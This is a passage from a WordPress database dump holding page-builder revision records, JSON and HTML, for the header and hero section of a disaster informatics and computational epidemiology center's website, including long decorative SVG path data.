2022<\\/p>\"},\"id\":\"22-h17\",\"parentId\":\"22-h16\",\"partialId\":22,\"styleRef\":259,\"type\":\"header\"}],\"id\":\"22-h16\",\"parentId\":\"22-h15\",\"partialId\":22,\"styleRef\":258,\"type\":\"header\"}],\"id\":\"22-h15\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":257,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"22-h11\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":253,\"type\":\"header\"}],\"id\":\"22-h10\",\"parentId\":\"22-h9\",\"partialId\":22,\"styleRef\":252,\"type\":\"header\"}],\"id\":\"22-h9\",\"parentId\":\"22-h8\",\"partialId\":22,\"styleRef\":251,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\"}},\"id\":\"22-h8\",\"parentId\":\"22-h7\",\"partialId\":22,\"styleRef\":250,\"type\":\"header\"}],\"id\":\"22-h7\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":249,\"type\":\"header\"}],\"id\":\"22-h3\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":245,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"type\":\"header\",\"id\":\"22-h2\",\"partialId\":22,\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":263,\"slot\":null,\"parentId\":\"22-h20\",\"index\":0,\"id\":\"22-h21\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h20\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":262,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":265,\"slot\":null,\"parentId\":\"22-h22\",\"index\":0,\"id\":\"22-h23\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h22\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":264,\"type\":\"header\"}],\"id\":\"22-h19\",\"parentId\":\"22-h18\",\"partialId\":22,\"styleRef\":261,\"type\":\"header\"}],\"id\":\"22-h18\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":260,\"type\":\"header\",\"slot\":\"topBar\"}]},\"styleRef\":244},{\"name\":\"hop-hero\",\"props\":{\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"},\"anchor\":false},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"text\"}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Center for Disaster Informatics &amp; Computational Epidemiology<br>\"},\"id\":\"22-h27\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":215,\"type\":\"header\"},{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>Enabling Data-Driven Disaster Assessment &amp; Planning<br><\\/p>\"},\"id\":\"22-h28\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":216,\"type\":\"header\"},{\"name\":\"hop-button-group\",\"children\":[{\"name\":\"hop-button\",\"props\":{\"text\":\"Learn More\",\"link\":{\"value\":\"\\/about\\/\"}},\"id\":\"22-h30\",\"parentId\":\"22-h29\",\"partialId\":22,\"styleRef\":218,\"type\":\"header\"}],\"id\":\"22-h29\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":217,\"type\":\"header\"}],\"id\":\"22-h26\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":214,\"type\":\"header\"},{\"name\":\"hop-column\",\"children\":[{\"name\":\"hop-image\",\"id\":\"22-h32\",\"parentId\":\"22-h31\",\"partialId\":22,\"styleRef\":221,\"type\":\"header\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/unsplash.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":258,\"size\":\"\"}}],\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"media\"}}},\"id\":\"22-h31\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":220,\"type\":\"header\"}],\"id\":\"22-h25\",\"parentId\":\"22-h24\",\"partialId\":22,\"styleRef\":213,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"id\":\"22-h24\",\"partialId\":22,\"styleRef\":212,\"type\":\"header\",\"slots\":{\"downArrow\":[{\"name\":\"hop-down-arrow\",\"slots\":{\"button\":[{\"name\":\"hop-down-arrow-scroll-button-group\",\"children\":[{\"name\":\"hop-down-arrow-scroll-button\",\"id\":\"22-h35\",\"parentId\":\"22-h34\",\"partialId\":22,\"styleRef\":224,\"type\":\"header\",\"props\":{\"text\":\"down\"}}],\"id\":\"22-h34\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":223,\"type\":\"header\"}],\"icon\":[{\"name\":\"hop-down-arrow-scroll-icon\",\"id\":\"22-h36\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":225,\"type\":\"header\",\"props\":{\"name\":\"font-awesome\\/angle-down\"}}]},\"parentId\":\"22-h24\",\"slot\":\"downArrow\",\"id\":\"22-h33\",\"partialId\":22,\"styleRef\":222,\"type\":\"header\"}]}}]}','','','inherit','closed','closed','','23-revision-v1','','','2022-02-16 15:45:52','2022-02-16 15:45:52','',23,'https://gsudice.dataconn.net/?p=338',0,'revision','',0);
INSERT INTO `wp_posts` VALUES (339,1,'2022-02-16 15:45:52','2022-02-16 15:45:52','<div data-colibri-id=\"22-h1\" class=\"page-header style-194 style-local-22-h1 position-relative\">\n  <!---->\n  <div data-colibri-navigation-overlap=\"false\" role=\"banner\" class=\"h-navigation_outer style-244-outer style-local-22-h2-outer\">\n    <!---->\n    <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"22-h2\" class=\"h-section h-navigation h-navigation d-flex style-244 style-local-22-h2\">\n      <!---->\n      <div class=\"h-section-grid-container h-section-fluid-container\">\n        <div data-nav-normal=\"\">\n          <div data-colibri-id=\"22-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-245 style-local-22-h3 position-relative\">\n            <!---->\n            <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n              <!---->\n              <div class=\"h-column h-column-container d-flex h-col-none style-246-outer style-local-22-h4-outer\">\n                <div data-colibri-id=\"22-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-246 style-local-22-h4 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"22-h5\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-247 style-local-22-h5 position-relative h-element\">\n                      <!---->\n                      <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n                        <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-247-image style-local-22-h5-image\">\n                        <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-247-image style-local-22-h5-image\">\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-248-outer style-local-22-h6-outer h-hide-sm\">\n                <div data-colibri-id=\"22-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-248 style-local-22-h6 h-hide-sm position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                    <!---->\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-249-outer style-local-22-h7-outer\">\n                <div data-colibri-id=\"22-h7\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-249 style-local-22-h7 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h8\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-mobile h-menu-horizontal h-dropdown-menu style-250 style-local-22-h8 position-relative h-element\">\n                      <!---->\n                      <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                      <div data-colibri-id=\"22-h9\" class=\"h-mobile-menu h-global-transition-disable style-251 style-local-22-h9 position-relative h-element\">\n                        <!---->\n                        <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-22-h9\" data-target-id=\"offcanvas-wrapper-22-h9\" data-offcanvas-overlay-id=\"offcanvas-overlay-22-h9\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n                          data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n                          <div class=\"icon-container h-hamburger-icon\">\n                            <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                              <!--Icon by Font Awesome (https://fontawesome.com)-->\n                              <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n                                <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n                              </svg>\n                            </div>\n                          </div>\n                        </a>\n                        <div id=\"offcanvas-wrapper-22-h9\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-251-offscreen style-local-22-h9-offscreen\">\n                          <div data-colibri-id=\"22-h10\" class=\"d-flex flex-column h-offscreen-panel style-252 style-local-22-h10 position-relative h-element\">\n                            <!---->\n                            <div class=\"offscreen-header h-ui-empty-state-container\">\n                              <div data-colibri-id=\"22-h12\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-254 style-local-22-h12 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-none style-255-outer style-local-22-h13-outer\">\n                                    <div data-colibri-id=\"22-h13\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-255 style-local-22-h13 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"22-h14\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-256 style-local-22-h14 position-relative h-element\">\n                                          <!---->\n                                          <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n                                            <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-256-image style-local-22-h14-image\">\n                                            <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-256-image style-local-22-h14-image\">\n                                          </a>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-content\">\n                              <!---->\n                              <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h11\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-253 style-local-22-h11 position-relative h-element\">\n                                <!---->\n                                <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-footer h-ui-empty-state-container\">\n                              <div data-colibri-id=\"22-h15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-257 style-local-22-h15 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-none style-258-outer style-local-22-h16-outer\">\n                                    <div data-colibri-id=\"22-h16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-258 style-local-22-h16 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"22-h17\" class=\"h-text h-text-component style-259 style-local-22-h17 position-relative h-element\">\n                                          <!---->\n                                          <!---->\n                                          <div class=\"\">\n                                            <p>© 2022</p>\n                                          </div>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                          </div>\n                        </div>\n                        <div id=\"offcanvas-overlay-22-h9\" class=\"offscreen-overlay style-251-offscreenOverlay style-local-22-h9-offscreenOverlay\"></div>\n                      </div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-id=\"22-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-212 style-local-22-h24 position-relative\">\n    <div class=\"background-wrapper\">\n      <div class=\"background-layer background-layer-media-container-lg\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n      <div class=\"background-layer background-layer-media-container-md\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n      <div class=\"background-layer background-layer-media-container\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n    </div>\n    <div class=\"h-separator\" style=\"height: 165px; top: 0px;\">\n      <svg style=\"fill:white;\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.14\" preserveAspectRatio=\"xMidYMax slice\">\n        <path d=\"M358.2,118.5c2.7.7,4.2.9,1.4,1.6,6.4.2,4.5-.4,6.4-.6-6.7-.4,5.4-.8,1.4-1.6C361,117.8,366.8,119.1,358.2,118.5Z\"></path>\n        <path d=\"M339.8,118.1c-3.6-.4,0-.6-6.3-.8C334.1,117.6,335.1,118,339.8,118.1Z\"></path>\n        <path d=\"M360.9,118.5c1-.3,4.5-.5-.8-.9C361.2,117.9,356.6,118.2,360.9,118.5Z\"></path>\n        <path d=\"M406.1,117.7c.9.2-1.1.5,1.9.6C410.1,118.2,412.5,117.9,406.1,117.7Z\"></path>\n        <path d=\"M374.9,117c2-.1,1.8-.7-3.4-.7C373,116.5,372.5,116.9,374.9,117Z\"></path>\n        <path d=\"M402.9,115.6c.6-.2,3.2-.2,2.2-.6C401.5,114.8,400,115.4,402.9,115.6Z\"></path>\n        <path d=\"M226.2,110.6c2-.2,1.7.7,4.8.8-1.5-.5,1.7-.5.5-1C228.2,110.4,222.5,110.2,226.2,110.6Z\"></path>\n        <path d=\"M404.4,114.2c-.2.1-1.4.1-2.6.2a8.94,8.94,0,0,0,3.2.5C405.3,114.7,406.5,114.4,404.4,114.2Z\"></path>\n        <path d=\"M332.9,111.9a66.47,66.47,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C339.1,111.5,336.8,112,332.9,111.9Z\"></path>\n        <path d=\"M393.1,112.4c-.9.3,2.5.4,4.7.5C399.4,112.6,398.4,112.3,393.1,112.4Z\"></path>\n        <path d=\"M340.6,111.1c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C339.4,111.3,344.9,111.3,340.6,111.1Z\"></path>\n        <path d=\"M313.3,110.2c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C309.5,110.3,312.9,110.4,313.3,110.2Z\"></path>\n        <path d=\"M317.1,108.2c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C309.8,107.9,313.6,108.4,317.1,108.2Z\"></path>\n        <path d=\"M326.8,108.1c-2.6.1-6.4,0-6.7.3C324.7,108.5,326.8,108.4,326.8,108.1Z\"></path>\n        <path d=\"M540.9,113c4,.1,3.8-.2,3.7-.5C540.1,112.4,540.3,112.7,540.9,113Z\"></path>\n        <path d=\"M320.1,106.8a37.78,37.78,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C320.3,107.4,318.6,107.3,320.1,106.8Z\"></path>\n        <path d=\"M361,107.5c-.4.3-7.1.6.8.9C359.5,108,365.2,107.8,361,107.5Z\"></path>\n        <path d=\"M368.1,104.5c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C371.8,104.4,366.8,104.2,368.1,104.5Z\"></path>\n        <path d=\"M354.9,102.2c-2.7-.1-3,.1-5.6,0,5.3.5-1.8,1.5,4.3,1.7.2-1.1,1.6-1.1,3.6-2.2C350.1,101.5,349.6,101.6,354.9,102.2Z\"></path>\n        <path d=\"M359,100.5c-5.3,0-4.4.6-6.1,1C359.4,101.6,357.9,100.9,359,100.5Z\"></path>\n        <path d=\"M87.7,93.8c-5.6-.2-1.5,1.4-.4,1.1C87.3,94.2,86.8,94.2,87.7,93.8Z\"></path>\n        <path d=\"M388.4,99.2a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C389.7,100.1,391.9,99.5,388.4,99.2Z\"></path>\n        <path d=\"M308,97.8c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C310.9,97.7,311.5,98,308,97.8Z\"></path>\n        <path d=\"M475.7,100.5c0,.2-3.8.8,2.2.9C476.8,101.2,478.9,100.7,475.7,100.5Z\"></path>\n        <path d=\"M369.5,98.2c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C378.9,98.6,369,97.9,369.5,98.2Z\"></path>\n        <path d=\"M112,92.9c0-.4,1.8-.7,1.8-1.2C110,91.7,108,92.8,112,92.9Z\"></path>\n        <path d=\"M465,99.5c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C462.7,99.7,465.9,99.8,465,99.5Z\"></path>\n        <path d=\"M382.4,97.1c-.5.3-2.3.7,1,1.1C383.6,98.1,386.1,97.5,382.4,97.1Z\"></path>\n        <path d=\"M375,96.6c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1A24.16,24.16,0,0,0,375,96.6Z\"></path>\n        <path d=\"M360.5,97.5c.2-.4,2.6-1-1.3-1.4C359.1,96.6,355.4,97,360.5,97.5Z\"></path>\n        <path d=\"M137.1,91.4c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C145.1,91.6,139.2,91.1,137.1,91.4Z\"></path>\n        <path d=\"M119,89.8c2.2.2,4.2.6,2,.7a26.11,26.11,0,0,1,2.8.1c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5C122.6,90,119.9,89.5,119,89.8Z\"></path>\n        <path d=\"M305.8,93.8c-.6.5,7.3.4,10,.3C312.4,93.7,308.9,94.1,305.8,93.8Z\"></path>\n        <path d=\"M383.2,94.8c4.5-.5,2,.4,6,.5.2-.5-1.5-.8-7.8-.9C381.8,94.5,381.2,94.8,383.2,94.8Z\"></path>\n        <path d=\"M312.9,90.7c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C309.3,91.2,313.2,91.2,312.9,90.7Z\"></path>\n        <path d=\"M477.8,95.1c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C476.5,95.3,476.8,95.2,477.8,95.1Z\"></path>\n        <path d=\"M320.4,91.3c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C320.8,91.7,324.3,91.5,320.4,91.3Z\"></path>\n        <path d=\"M122.5,85.9c.2.3-4.3.8.9,1C122.6,86.6,126.8,86.2,122.5,85.9Z\"></path>\n        <path d=\"M311.1,90.3c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C303.4,89.8,308.8,89.9,311.1,90.3Z\"></path>\n        <path d=\"M163.4,85.1c4.8.2,7.4-.4,2.2-.6C163.8,84.6,165.2,85,163.4,85.1Z\"></path>\n        <path d=\"M422,90c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C418.8,90.3,425.8,90.5,422,90Z\"></path>\n        <path d=\"M315,86.9c-5.7-.1-11.4.9-5.9,1.2-1.1-.3.2-.4,4-.2C307.8,87.2,319.7,87.3,315,86.9Z\"></path>\n        <path d=\"M321.2,86c3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.4.2-2.5.7,2.2.9,1.4-.6,2,.4,7.2.3C326.4,86.9,326.5,85.9,321.2,86Z\"></path>\n        <path d=\"M352.5,86.8c-1.5-.7-5.1,0-8.8-.5,1.6.5-.5.8,3.6,1C346,86.8,349.2,86.5,352.5,86.8Z\"></path>\n        <path d=\"M500.2,90.5c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A25,25,0,0,1,500.2,90.5Z\"></path>\n        <path d=\"M359,86.3c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C362.5,85.8,360.3,86,359,86.3Z\"></path>\n        <path d=\"M474.6,88.3c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A37.42,37.42,0,0,0,474.6,88.3Z\"></path>\n        <path d=\"M147.8,78.4c1.8-.3-4.9-.2-4.5-.4,6.3-.1-3.5-.6,2.3-.6-2.7,0-3.2-.2-5.8-.2.5.9,3.7,1.5-1.1,1.9,4.5.4,2,1.2,7,1.6,0-.5,1.5-1.1-1.6-1.8,1.4-.2,6.1.4,5.5-.1C146.3,78.7,142.1,78,147.8,78.4Z\"></path>\n        <path d=\"M317,84.4c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C315.3,84.2,312.8,84.2,317,84.4Z\"></path>\n        <path d=\"M265.7,81.4c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C267.7,82.1,268.8,81.5,265.7,81.4Z\"></path>\n        <path d=\"M182.7,80.2c-4.1-.3-1.3-1-6.7-1.2C177.3,79.3,176.1,79.8,182.7,80.2Z\"></path>\n        <path d=\"M238.5,80.4c1.8.3-3.8.4.6.7-1-.4,3.6-.2,3.8-.5C240.9,80.6,239.7,80.5,238.5,80.4Z\"></path>\n        <path d=\"M335.4,83.2c4.5.2,7.8-.1,3.9-.4C338.9,83,333.8,82.8,335.4,83.2Z\"></path>\n        <path d=\"M118,77.6a10.17,10.17,0,0,1-2.7,0q0,.45,3.3.6C116.8,78,122.4,77.9,118,77.6Z\"></path>\n        <path d=\"M126.7,78c3.7.1,4.6.4,8.8.5-.2-.3-1.8-.6-4.8-.8C130.7,78,126,77.8,126.7,78Z\"></path>\n        <path d=\"M308.8,81.4c-.8.3-1,.4,2,.7-1.6-.4,3.5-.1,3.9-.3C310.3,81.8,311.1,81.5,308.8,81.4Z\"></path>\n        <path d=\"M246.7,80.3c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C253.5,80.5,245.4,80,246.7,80.3Z\"></path>\n        <path d=\"M173.5,77.7c5.8.1,1,.9,5.1,1.1,1.8-.6,3.6-1.6-3.4-2.3-4.1.2,3.1.7,2.4,1.1A37.48,37.48,0,0,0,173.5,77.7Z\"></path>\n        <path d=\"M315.9,81.5c0-.3,2.2-.4,2.1-.7C314.1,80.7,312.8,81.3,315.9,81.5Z\"></path>\n        <path d=\"M351.3,82.2c.3-.4,1.3-.5-3.4-.7C348.9,81.7,346.2,82.2,351.3,82.2Z\"></path>\n        <path d=\"M220.8,79.3c.6-.2,3.2-.2,2.2-.6C219.9,78.7,215.9,79.1,220.8,79.3Z\"></path>\n        <path d=\"M152.4,77.3c1.7-.3,1.1-.6-3.5-.8C149,76.8,150,77.1,152.4,77.3Z\"></path>\n        <path d=\"M347.3,79.3c-5-.2-2.6.8-.6.9C349,79.9,345.9,79.7,347.3,79.3Z\"></path>\n        <path d=\"M139.5,75.2c3.9,0,3.8.2,7.2.3C147.6,75.1,139.3,74.8,139.5,75.2Z\"></path>\n        <path d=\"M172.1,74.5c2.1.1,2.6.2,4.5.3-2.4-.6-2-.8-3.9-1.3C172.9,73.9,170.7,74,172.1,74.5Z\"></path>\n        <path 